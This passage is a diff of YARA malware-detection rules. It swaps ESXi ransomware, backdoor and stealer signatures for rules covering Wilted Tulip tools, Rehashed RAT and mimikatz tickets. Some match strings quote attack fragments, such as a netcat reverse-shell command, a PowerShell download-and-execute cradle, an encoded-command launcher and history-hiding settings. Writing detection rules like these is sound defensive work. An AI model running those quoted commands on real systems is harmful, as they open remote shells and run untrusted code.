+		logic_hash = "716db8f8e7d71c7f3deaeb9ac8e141c9bf374e5dae992e8e2623070c81089953"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "11b1b2375d9d840912cfd1f0d0d04d93ed0cddb0ae4ddb550a5b62cd044d6b66"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c75906dbc3078ff81092f6a799c31afc79b1dece29db696b2ecf27951a86a1b2"
 
 	strings:
-		$x1 = "usage: encrypt <public_key> <file_to_encrypt> [<enc_step>] [<enc_size>] [<file_size>]" ascii fullword
-		$x2 = "[ %s ] - FAIL { Errno: %d }" ascii fullword
-		$s1 = "lPEM_read_bio_RSAPrivateKey" ascii fullword
-		$s2 = "lERR_get_error" ascii fullword
-		$s3 = "get_pk_data: key file is empty!" ascii fullword
-		$op1 = { 8b 45 a8 03 45 d0 89 45 d4 8b 45 a4 69 c0 07 53 65 54 89 45 a8 8b 45 a8 c1 c8 19 }
-		$op2 = { 48 89 95 40 fd ff ff 48 83 bd 40 fd ff ff 00 0f 85 2e 01 00 00 48 8b 9d 50 ff ff ff 48 89 9d 30 fd ff ff 48 83 bd 30 fd ff ff 00 78 13 f2 48 0f 2a 85 30 fd ff ff }
-		$op3 = { 31 55 b4 f7 55 b8 8b 4d ac 09 4d b8 8b 45 b8 31 45 bc c1 4d bc 13 c1 4d b4 1d }
+		$x1 = ".\\Get_AD_Users_Logon_History.ps1 -MaxEvent" fullword ascii
+		$x2 = "if ((Resolve-dnsname $_.\"IP Address\" -Type PTR -TcpOnly -DnsOnly -ErrorAction \"SilentlyContinue\").Type -eq \"PTR\")" fullword ascii
+		$x3 = "$Client_Name = (Resolve-dnsname $_.\"IP Address\" -Type PTR -TcpOnly -DnsOnly).NameHost  " fullword ascii
+		$x4 = "########## Find the Computer account in AD and if not found, throw an exception ###########" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
+		( filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_PY_Esxi_Backdoor_Dec22 : FILE
+
+rule SIGNATURE_BASE_Wiltedtulip_Matryoshka_Injector : FILE
 {
 	meta:
-		description = "Detects Python backdoor found on ESXi servers"
-		author = "Florian Roth"
-		id = "f0a3b9b9-0031-5d9f-97f8-70f83863ee63"
-		date = "2022-12-14"
+		description = "Detects hack tool used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e4cf2a31-33c8-5db1-84ca-f63b65a0a0a3"
+		date = "2017-07-23"
 		modified = "2023-12-05"
-		reference = "https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L58-L71"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L167-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "86b628f007720aa706c30d91e845d867ed481d1e99bcc9315c84a4e0b7b1b2a6"
-		score = 85
+		logic_hash = "e02d26882c85b77bd97629fce20bd027e1f5f7e28ae0c43c9ea7a4b1e5d02cd1"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c41e97b3b22a3f0264f10af2e71e3db44e53c6633d0d690ac4d2f8f5005708ed"
+		hash2 = "b93b5d6716a4f8eee450d9f374d0294d1800784bc99c6934246570e4baffe509"
 
 	strings:
-		$x1 = "cmd = str(base64.b64decode(encoded_cmd), " ascii
-		$x2 = "sh -i 2>&1 | nc %s %s > /tmp/" ascii
+		$s1 = "Injector.dll" fullword ascii
+		$s2 = "ReflectiveLoader" fullword ascii
 
 	condition:
-		filesize < 10KB and 1 of them or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them ) or ( pe.exports ( "__dec" ) and pe.exports ( "_check" ) and pe.exports ( "_dec" ) and pe.exports ( "start" ) and pe.exports ( "test" ) )
 }
-rule SIGNATURE_BASE_APT_SH_Esxi_Backdoor_Dec22 : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Zpp : FILE
 {
 	meta:
-		description = "Detects malicious script found on ESXi servers"
-		author = "Florian Roth"
-		id = "983ac20c-2e61-5365-8849-b3aeb999f909"
-		date = "2022-12-14"
-		modified = "2023-12-05"
-		reference = "https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L73-L87"
+		description = "Detects hack tool used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7d833cb2-485e-5a26-be2f-aaebde7fdef2"
+		date = "2017-07-23"
+		modified = "2022-12-21"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L191-L215"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "155a90a6c55b99285555634d91a66fca9c7e7297f05314fa4d6ce1d84257ee11"
+		logic_hash = "32c91f8a02443a6f024acb3f941b7f11472e7f1517c54a3c7edc89ce88ba73e0"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "10ec585dc1304436821a11e35473c0710e844ba18727b302c6bd7f8ebac574bb"
+		hash2 = "7d046a3ed15035ea197235980a72d133863c372cc27545af652e1b2389c23918"
+		hash3 = "6d6816e0b9c24e904bc7c5fea5951d53465c478cc159ab900d975baf8a0921cf"
 
 	strings:
-		$x1 = "mv /bin/hostd-probe.sh /bin/hostd-probe.sh.1" ascii fullword
-		$x2 = "/bin/nohup /bin/python -u /store/packages/vmtools.py" ascii
-		$x3 = "/bin/rm /bin/hostd-probe.sh.1"
+		$x1 = "[ERROR] Error Main -i -s -d -gt -lt -mb" fullword wide
+		$x2 = "[ERROR] Error Main -i(with.) -s -d -gt -lt -mb -o -e" fullword wide
+		$s1 = "LT Time invalid" fullword wide
+		$s2 = "doCompressInNetWorkDirectory" fullword ascii
+		$s3 = "files remaining ,total file save = " fullword wide
+		$s4 = "$ec996350-79a4-477b-87ae-2d5b9dbe20fd" fullword ascii
+		$s5 = "Destinition Directory Not Found" fullword wide
+		$s6 = "\\obj\\Release\\ZPP.pdb" ascii
 
 	condition:
-		filesize < 10KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_SH_Esxi_Attacks_Feb23_2 : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Netsrv_Netsrvs : FILE
 {
 	meta:
-		description = "Detects script used in ransomware attacks exploiting and encrypting ESXi servers"
-		author = "Florian Roth"
-		id = "d1282dee-0496-52f1-a2b7-27657ab4df8c"
-		date = "2023-02-06"
+		description = "Detects sample from Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4b58bb08-88da-535c-8ce5-e7113e5b7045"
+		date = "2017-07-23"
 		modified = "2023-12-05"
-		reference = "https://dev.to/xakrume/esxiargs-encryption-malware-launches-massive-attacks-against-vmware-esxi-servers-pfe"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L89-L101"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L217-L242"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3f240784873a0239cbf61f7f420fdd72b8992d5943ffc3d4dcad43c836569f4d"
-		score = 85
+		logic_hash = "1506d1eddd43731c00e5f01a292589b07de5055bbdd7b1f7c2d7ac7a09b8ae58"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a062cb4364125427b54375d51e9e9afb0baeb09b05a600937f70c9d6d365f4e5"
+		hash2 = "afa563221aac89f96c383f9f9f4ef81d82c69419f124a80b7f4a8c437d83ce77"
+		hash3 = "acf24620e544f79e55fd8ae6022e040257b60b33cf474c37f2877c39fbf2308a"
+		hash4 = "bff115d5fb4fd8a395d158fb18175d1d183c8869d54624c706ee48a1180b2361"
+		hash5 = "07ab795eeb16421a50c36257e6e703188a0fef9ed87647e588d0cd2fcf56fe43"
 
 	strings:
-		$x1 = "echo \"START ENCRYPT: $file_e SIZE: $size_kb STEP SIZE: " ascii
+		$s1 = "Process %d Created" fullword ascii
+		$s2 = "%s\\system32\\rundll32.exe" fullword wide
+		$s3 = "%s\\SysWOW64\\rundll32.exe" fullword wide
+		$c1 = "slbhttps" fullword ascii
+		$c2 = "/slbhttps" fullword wide
+		$c3 = "/slbdnsk1" fullword wide
+		$c4 = "netsrv" fullword wide
+		$c5 = "/slbhttps" fullword wide
 
 	condition:
-		filesize < 10KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) and 1 of ( $c* ) ) )
 }
-rule SIGNATURE_BASE_SUSP_Esxiargs_Endpoint_Conf_Aug23 : FILE
+
+rule SIGNATURE_BASE_Wiltedtulip_Reflectiveloader : FILE
 {
 	meta:
-		description = "Detects indicators found in endpoint.conf files as modified by actors in the ESXiArgs campaign"
-		author = "Florian Roth"
-		id = "3e0b5dbf-7c5b-5599-823a-ce35fbdbe64b"
-		date = "2023-08-04"
+		description = "Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0c7dfb44-8acb-5f36-9683-745560f1f795"
+		date = "2017-07-23"
 		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-47"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L103-L120"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L244-L268"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "794d460eec0e2f0b48e6ced94b125a1e48acde6be6281866e0b4a2ae6c2d3b51"
+		logic_hash = "9488d2e97d0ea031a138e72964a3b56781f9d05c1676ff0b360407db944e26de"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904"
+		hash2 = "1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a"
+		hash3 = "a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f"
+		hash4 = "cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0"
+		hash5 = "eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89"
 
 	strings:
-		$a1 = "/client/clients.xml" ascii
-		$a2 = "/var/run/vmware/proxy-sdk-tunnel" ascii fullword
-		$a3 = "redirect" ascii fullword
-		$a4 = "allow" ascii fullword
-		$s1 = " local 8008 allow allow"
+		$x1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+		$x2 = "%d is an x86 process (can't inject x64 content)" fullword ascii
+		$x3 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
+		$x4 = "Failed to impersonate token from %d (%u)" fullword ascii
+		$x5 = "Failed to impersonate logged on user %d (%u)" fullword ascii
+		$x6 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
 
 	condition:
-		filesize < 2KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them ) or ( 2 of them ) or pe.exports ( "_ReflectiveLoader@4" )
 }
-rule SIGNATURE_BASE_Mal_Lockbit4_Hashing_Alg_Win_Feb24 : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Matryoshka_RAT : FILE
 {
 	meta:
-		description = "This rule detects the custom hashing algorithm of Lockbit4.0 unpacked"
-		author = "0x0d4y"
-		id = "e91aedba-6f70-4ca2-9217-2991cbbc6e8d"
-		date = "2024-02-16"
-		modified = "2025-03-20"
-		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit4_hashing_alg_win_feb24.yar#L1-L22"
+		description = "Detects Matryoshka RAT used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e851e212-bb71-55c9-9bc1-0041bb04bef5"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L270-L289"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "062311f136d83f64497fd81297360cd4"
-		logic_hash = "41497ea30a4cfdd111726a5819ec404a1eeba1693f5d6b89ac38558eb1c6bde9"
-		score = 100
+		logic_hash = "9e878d9e3dc3f2050e52a046038f4f855b5b777948d928e0bc6d7a98fc0a7119"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "CC BY 4.0"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.lockbit"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6f208473df0d31987a4999eeea04d24b069fdb6a8245150aa91dfdc063cd64ab"
+		hash2 = "6cc1f4ecd28b833c978c8e21a20a002459b4a6c21a4fbaad637111aa9d5b1a32"
 
 	strings:
-		$hashing_alg = { 41 89 d0 46 0f be 04 00 45 09 c0 74 ?? 45 8d 48 ?? 45 8d 50 ?? 41 80 f9 ?? 45 0f 43 d0 44 31 d1 44 8d 04 3a 45 0f af c2 41 01 c8 89 d1 31 f9 09 d2 0f 44 ca 41 0f af c8 44 01 d1 ff c2 eb ?? 49 ff c6 }
+		$s1 = "%S:\\Users\\public" fullword wide
+		$s2 = "ntuser.dat.swp" fullword wide
+		$s3 = "Job Save / Load Config" fullword wide
+		$s4 = ".?AVPSCL_CLASS_JOB_SAVE_CONFIG@@" fullword ascii
+		$s5 = "winupdate64.com" fullword ascii
+		$s6 = "Job Save KeyLogger" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $hashing_alg
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them )
 }
-rule SIGNATURE_BASE_SUSP_RDP_File_Indicators_Oct24_1 : FILE
+rule SIGNATURE_BASE_SUSP_Gobfuscate_May21 : FILE
 {
 	meta:
-		description = "Detects characteristics found in malicious RDP files used as email attachments in spear phishing campaigns"
-		author = "Florian Roth"
-		id = "16128c1e-64ed-5a3e-ad1e-e0330d91f5a9"
-		date = "2024-10-25"
-		modified = "2024-12-12"
-		reference = "https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nobellium_rdp_phish.yar#L2-L24"
+		description = "Identifies binaries obfuscated with gobfuscate"
+		author = "James Quinn, Paul Hager (merged with new similar pattern)"
+		id = "ae518296-b1c3-568c-bae0-3e0a6f7600ba"
+		date = "2021-05-14"
+		modified = "2024-04-02"
+		reference = "https://github.com/unixpickle/gobfuscate"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gobfuscate.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "55bd63738c38719ce7aeb874956488b0d3f7167a31d880ee61994b5921bd1458"
-		score = 75
+		logic_hash = "f71078dd6354a482a2ead2f0d25f4172cd40e62440a70c2da7916b68f26909a3"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "280fbf353fdffefc5a0af40c706377142fff718c7b87bc8b0daab10849f388d0"
-		hash2 = "8b45f5a173e8e18b0d5c544f9221d7a1759847c28e62a25210ad8265f07e96d5"
-		hash3 = "9b8cb8b01ce4eafb9204250a3c28bfaf70cc76a99ce411ad52bbf1aa2b6cce34"
-		hash4 = "ba4d58f2c5903776fe47c92a0ec3297cc7b9c8fa16b3bf5f40b46242e7092b46"
-		hash5 = "f357d26265a59e9c356be5a8ddb8d6533d1de222aae969c2ad4dc9c40863bfe8"
 
 	strings:
-		$s1 = "redirectclipboard:i:1" wide fullword
-		$s2 = "redirectprinters:i:1" wide fullword
-		$s3 = "remoteapplicationmode:i:1" wide fullword
-		$s4 = "username:s:" wide
-		$s5 = "emoteapplicationicon:s:C:\\Windows\\SystemApps" wide
+		$s1 = { 0F B6 ?? ?? ?? 0F B6 ?? ?? ?? 31 D? [0-1] 88 ?? ?? ?? 48 FF C? 48 83 F? ?? 7C E6 48 }
+		$s2 = { 0F B6 ?? ?? ?? 31 DA 88 ?? ?? ?? 40 83 ?? ?? 7D 09 0F B6 }
 
 	condition:
-		filesize < 50KB and all of them
+		filesize < 50MB and any of them
 }
-rule SIGNATURE_BASE_MAL_UNC2891_Slapstick : FILE
+
+rule SIGNATURE_BASE_Rehashed_RAT_1 : FILE
 {
 	meta:
-		description = "Detects UNC2891 Slapstick pam backdoor"
-		author = "Frank Boldewin (@r3c0nst), slightly modifier by Florian Roth"
-		id = "eb5db507-ac12-5c11-9dd9-ec34b9a80e1c"
-		date = "2022-03-30"
-		modified = "2023-01-05"
-		reference = "https://github.com/fboldewin/YARA-rules/tree/master"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2891_mal_jan23.yar#L19-L39"
+		description = "Detects malware from Rehashed RAT incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "24536421-3f8f-58f3-8245-06c519d7a21a"
+		date = "2017-09-08"
+		modified = "2023-12-05"
+		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rehashed_rat.yar#L13-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4bc51a47a1b620c3bb950c287c38a37e528e79f9720fb4d9fa9ebecbeca82036"
+		logic_hash = "06a98e87d931bdea697a2cf3de604f03654f9aa2b3f2346e78ba92e492c0fc7c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "9d0165e0484c31bd4ea467650b2ae2f359f67ae1016af49326bb374cead5f789"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "37bd97779e854ea2fc43486ddb831a5acfd19cf89f06823c9fd3b20134cb1c35"
 
 	strings:
-		$code1 = {F6 50 04 48 FF C0 48 39 D0 75 F5}
-		$code2 = {88 01 48 FF C1 8A 11 89 C8 29 F8 84 D2 0F 85}
-		$str1 = "/proc/self/exe" fullword ascii
-		$str2 = "%-23s %-23s %-23s %-23s %-23s %s" fullword ascii
-		$str3 = "pam_sm_authenticate" ascii
-		$str_fr1 = "HISTFILE=/dev/null"
+		$x1 = "C:\\Users\\hoogle168\\Desktop\\"
+		$x2 = "\\NewCoreCtrl08\\Release\\NewCoreCtrl08.pdb" ascii
+		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729" ascii
+		$s2 = "NewCoreCtrl08.dll" fullword ascii
+		$s3 = "GET /%s%s%s%s HTTP/1.1" fullword ascii
+		$s4 = "http://%s:%d/%s%s%s%s" fullword ascii
+		$s5 = "MyTmpFile.Dat" fullword wide
+		$s6 = "root\\%s" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 100KB and ( all of ( $code* ) or all of ( $str* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and ( pe.imphash ( ) == "893212784d01f11aed9ebb42ad2561fc" or pe.exports ( "ProcessTrans" ) or ( 1 of ( $x* ) or 4 of them ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Merlinagent
+
+rule SIGNATURE_BASE_Rehashed_RAT_2 : FILE
 {
 	meta:
-		description = "Detects Merlin agent"
-		author = "Hilko Bengen"
-		id = "92346a3f-dce4-58db-893b-b7797fa20029"
-		date = "2017-12-26"
+		description = "Detects malware from Rehashed RAT incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fcf82155-10da-56b7-879b-841c4ae5023b"
+		date = "2017-09-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/Ne0nd0g/merlin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_merlin_agent.yar#L2-L27"
+		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rehashed_rat.yar#L41-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "21743230556cc11a78942de30be476ad8e73731bbda9a4feb83bd8140a703d01"
+		logic_hash = "96c4582981792eb5f8180c06a5fe824fd439cfa0ede294eccff3afa7d318a6e9"
 		score = 75
 		quality = 85
-		tags = ""
-		filetype = "pe, elf, mach"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "49efab1dedc6fffe5a8f980688a5ebefce1be3d0d180d5dd035f02ce396c9966"
 
 	strings:
-		$x1 = "Command output:\x0d\x0a\x0d\x0a%s"
-		$x2 = "[-]Connecting to web server at %s to update agent configuration information."
-		$x3 = "[-]%d out of %d total failed checkins"
-		$x4 = "[!}Unknown AgentControl message type received %s"
-		$x5 = "[-]Received Agent Kill Message"
-		$x6 = "[-]Received Server OK, doing nothing"
-		$x7 = "[!]There was an error with the HTTP client while performing a POST:"
-		$x8 = "[-]Sleeping for %s at %s"
-		$s1 = "Executing command %s %s %s"
-		$s2 = "[+]Host Information:"
-		$s3 = "\tHostname: %s"
-		$s4 = "\tPlatform: %s"
-		$s5 = "\tUser GUID: %s"
+		$x1 = "dalat.dulichovietnam.net" fullword ascii
+		$x2 = "web.Thoitietvietnam.org" fullword ascii
+		$a1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64)" fullword ascii
+		$a2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii
+		$s1 = "GET /%s%s%s%s HTTP/1.1" fullword ascii
+		$s2 = "http://%s:%d/%s%s%s%s" fullword ascii
+		$s3 = "{521338B8-3378-58F7-AFB9-E7D35E683BF8}" fullword ascii
 
 	condition:
-		1 of ( $x* ) or 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "9c4c648f4a758cbbfe28c8850d82f931" or ( 1 of ( $x* ) or 3 of them ) ) ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_SUSP_MAL_EXFIL_Stealer_Output_Characteristics_Sep22_1 : FILE
+rule SIGNATURE_BASE_Rehashed_RAT_3 : FILE
 {
 	meta:
-		description = "Detects typical stealer output files as created by RedLine or Racoon stealer"
+		description = "Detects malware from Rehashed RAT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c1cab3c3-c4f3-5a19-9ea3-9e4242238359"
-		date = "2022-09-17"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1570965878480719873"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_stealer_exfil_zip.yar#L2-L30"
+		id = "59871be1-295f-54ee-ab4d-4f9e5fdc2935"
+		date = "2017-09-08"
+		modified = "2022-12-21"
+		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rehashed_rat.yar#L69-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "197bb4b837cdd635f9340547b10a90c3a2a17f0113076c5ccbc0a91b7ae18eeb"
-		score = 70
+		logic_hash = "46f21f11959f863c85a1cfac74a28ba86d5b9789fea5a428168d157c13cce022"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "8ce14c6b720281f43c75ce52e23ec13d08e7b2be1c5fbc2d704238f1fdd1a07f"
-		hash2 = "011c19d18fa446a2619b3a2512dacb2694e1da99a2c2ea7828769f1373ecd8fe"
-		hash3 = "418530bc7210f74ada8e7f16b41ea2033054e99f0c4423ce1d3ebf973c89e3a3"
-		hash4 = "aa6e2c8447f66527f9b6f4d54f57edc6cabe56095df94dc0656dca02e11356ab"
-		hash5 = "bbfb608061931565debac405ffebe3c4bb5dac8042443fe4e80aa03395955bd2"
-		hash6 = "c15107beecf3301fb12d140690034717e16bd5312a746e7ff43a7925e5533260"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9cebae97a067cd7c2be50d7fd8afe5e9cf935c11914a1ab5ff59e91c1e7e5fc4"
 
 	strings:
-		$sa1 = "passwords.txt" ascii
-		$sa2 = "autofills/" ascii
-		$sa3 = "browsers/cookies/" ascii
-		$sa4 = "wallets/" ascii
-		$sb1 = "Passwords.txt" ascii
-		$sb2 = "Autofills/" ascii
-		$sb3 = "Browsers/Cookies/" ascii
-		$sb4 = "Wallets/" ascii
+		$x1 = "\\BisonNewHNStubDll\\Release\\Goopdate.pdb" ascii
+		$s2 = "psisrndrx.ebd" fullword wide
+		$s3 = "pbad exception" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 5000KB and ( 2 of ( $sa* ) or 2 of ( $sb* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them )
 }
-
-rule SIGNATURE_BASE_EXT_APT32_Goopdate_Installer
+rule SIGNATURE_BASE_Mimikatz_Kirbi_Ticket : FILE
 {
 	meta:
-		description = "Detects APT32 installer side-loaded with goopdate.dll"
-		author = "Facebook"
-		id = "08f3cbda-ccb7-517a-b205-5f71de26c735"
+		description = "KiRBi ticket for mimikatz"
+		author = "Benjamin DELPY (gentilkiwi); Didier Stevens"
+		id = "a37249e0-ab3b-50c2-9473-1e69185713cc"
 		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt32.yar#L3-L20"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_kirbi_mimkatz.yar#L10-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "69730f2c2bb9668a17f8dfa1f1523e0e1e997ba98f027ce98f5cbaa869347383"
-		logic_hash = "1dcb3009c5c19ff4e54d82d3a4b99b3431e78664f1660522a781e815d96958c4"
+		logic_hash = "2a62c24954d64346e419985ef5bf2b357b2aee41ac6b33d379dbd65cf5c9f92b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s0 = { 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? }
-		$s1 = "GetProcAddress"
-		$s2 = { 8B 4D FC ?? ?? 0F B6 51 0C ?? ?? 8B 4D F0 0F B6 1C 01 33 DA }
-		$s3 = "FindNextFileW"
-		$s4 = "Process32NextW"
+		$asn1 = { 76 82 ?? ?? 30 82 ?? ?? a0 03 02 01 05 a1 03 02 01 16 }
